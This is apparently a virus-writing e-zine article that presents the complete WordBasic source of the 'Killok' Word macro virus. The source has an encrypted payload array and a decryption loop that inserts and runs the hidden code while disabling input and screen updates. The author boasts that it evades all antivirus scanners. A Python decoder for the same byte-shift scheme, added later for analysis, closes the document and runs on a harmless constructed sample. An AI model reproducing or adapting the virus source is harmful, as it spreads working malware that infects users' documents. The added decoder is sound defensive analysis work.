SLAM2.006: WordMacro Virus Killok by NJ [SLAM]
[ WordMacro. Killok ]---------------
■ VIRUSNAME: Killok
■ SIZE: 965 Bytes
■ ORIGIN: Germany
˛ AUTHOR: Nightmare Joker
->Polymorf No
->Stealth No
->Encrypted Yes
->Retro No
-------------------------------------
Here it is: the new anti-heuristic Word macro virus Killok!
When the virus becomes active, it opens the macro window "Killok", decrypts the main code (NJ$(x)), inserts it and runs the macro.
Finally, the virus closes the macro window "Killok" without saving it.
OK, look at the following source code:
-----------------------------------------------------------------------------
Dim Shared NJ$(18)
Sub MAIN
NJ$(1) = "û«÷بí®>ÿ◊êıØ´fiê÷"
NJ$(2) = "∑~z_z «í®˘ØÄ®~,ü"
NJ$(3) = " êfizµz_z<z©êzùêÿ‘◊ «í®÷,ü"
NJ$(4) = "ú∑z «í®÷~, «í®˘ØÄ®~,µüüz-òz||z©∂®‘"
NJ$(5) = " «í®›«÷◊zµ" : DisableInput 'Set DisableInput On
NJ$(6) = "∂~z_z «í®˘ØÄ®~,ü"
NJ$(7) = "ú∑z∑~z-òz∂~z©∂®‘"
NJ$(8) = "ú∑z≠®◊ûê´ÿÄ®‘◊¯Øfi~,|æ«ííêè|üz_z||z©∂®‘"
NJ$(9) = " «í®Ø—®>÷zà êfiÄØ◊z_z<"
NJ$(10) = "z®◊ûê´ÿÄ®‘◊¯Øfiz|zéçéûz|˝z◊fi~,™‘Û,üüz"
NJ$(11) = "ıØ´fiêù꓇z∑~z_z|ò>ÿ◊ê∏“®‘|˝z∂~z_z|ò|˝z<"
NJ$(12) = "®◊ûê´ÿÄ®‘◊¯Øfiz|æ«ííêè|˝z◊fi~,™‘Û,üü"
NJ$(13) = "Y‘Ûzú∑" : ScreenUpdating 'Set ScreenUpdating Off
NJ$(14) = " «í®ùíê÷®z<"
NJ$(15) = "Y‘Ûzú∑" : NJ$ = FileName$() 'NJ$ = file name
NJ$(16) = "Y‘Ûzú∑"
NJ$(17) = "˘®„◊zµ"
NJ$(18) = "û«÷بí®>ÿ◊êıØ´fiê÷zS"
REM Open the Killok macro window.
NJ = 0 : ToolsMacro .Name = "Killok", .Show = 3, .Edit
REM Decrypt now the main virus code.
For a = 1 To 18
For xy = 1 To Len(NJ$(a))
b = Asc(Mid$(NJ$(a), xy, 1))
If c = 255 Then c = 148
c = b - 90
If c < 0 Then c = c + 255
If c = 165 Then c = 58
d$ = d$ + Chr$(c)
Next xy
Insert d$ : InsertPara : d$ = ""
Next a
REM Activate the infected document, run the killok macro,
REM go back to the macro window and close it.
Activate NJ$ : Killok : NextWindow : DocClose 2
REM Set ScreenUpdating On and DisableInput Off
Killok$ = "NJ" : ScreenUpdating : DisableInput 0
End Sub
-----------------------------------------------------------------------------
Try to decrypt the main code! It's easy. :)
BTW, Killok is at the moment undetectable by all AV scanners.
- Nightmare Joker -
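
For analysis: the decryption loop in the listing is a fixed byte shift, so string constants hidden this way can be recovered statically, without opening the document in Word. The Python below is an added example, not part of the original article; it mirrors the loop's arithmetic and flags a string array whose decoded form contains WordBasic keywords. The sample bytes, the keyword list and the function names are constructed for illustration.

```python
# Added analysis example (not from the original article).
# Recovers strings hidden with the listing's byte-shift scheme and flags
# arrays that decode to WordBasic source. Sample data below is constructed.

KEY = 90  # shift used by the listing's loop: c = b - 90

# Assumed keyword list for scoring decoded text; extend as needed.
KEYWORDS = ("Sub MAIN", "End Sub", "End If", "MsgBox", "MacroCopy", "FileSaveAs")


def decode(data):
    """Mirror the listing's inner loop for one encoded string (bytes -> str)."""
    out = []
    for b in data:
        c = b - KEY
        if c < 0:          # wrap-around, as in: If c < 0 Then c = c + 255
            c += 255
        if c == 165:       # as in the listing: 165 becomes ':' (58)
            c = 58
        out.append(chr(c))
    # The listing's "If c = 255 Then c = 148" runs before c is reassigned,
    # so it has no effect on the output and is not reproduced here.
    return "".join(out)


def scan(strings, min_hits=2):
    """Decode an array of string constants; return (lines, keyword hits).

    lines is empty when fewer than min_hits keywords appear, i.e. the array
    does not look like shifted WordBasic source.
    """
    lines = [decode(s) for s in strings]
    text = "\n".join(lines)
    hits = [k for k in KEYWORDS if k in text]
    return (lines if len(hits) >= min_hits else []), hits


# Constructed sample: a harmless three-line macro, shifted by +90.
SAMPLE = [
    bytes.fromhex("adcfbc7aa79ba3a8"),
    bytes.fromhex("a7cdc19cc9d27a7cbebfc7c97c7aff7a9cbfbfca"),
    bytes.fromhex("9fc8be7aadcfbc"),
]

if __name__ == "__main__":
    decoded, found = scan(SAMPLE)
    print(found)
    print("\n".join(decoded))
```

Run over string constants extracted from a macro, a non-empty result means the array is shifted WordBasic source and the decoded lines can be passed to a scanner as plain text.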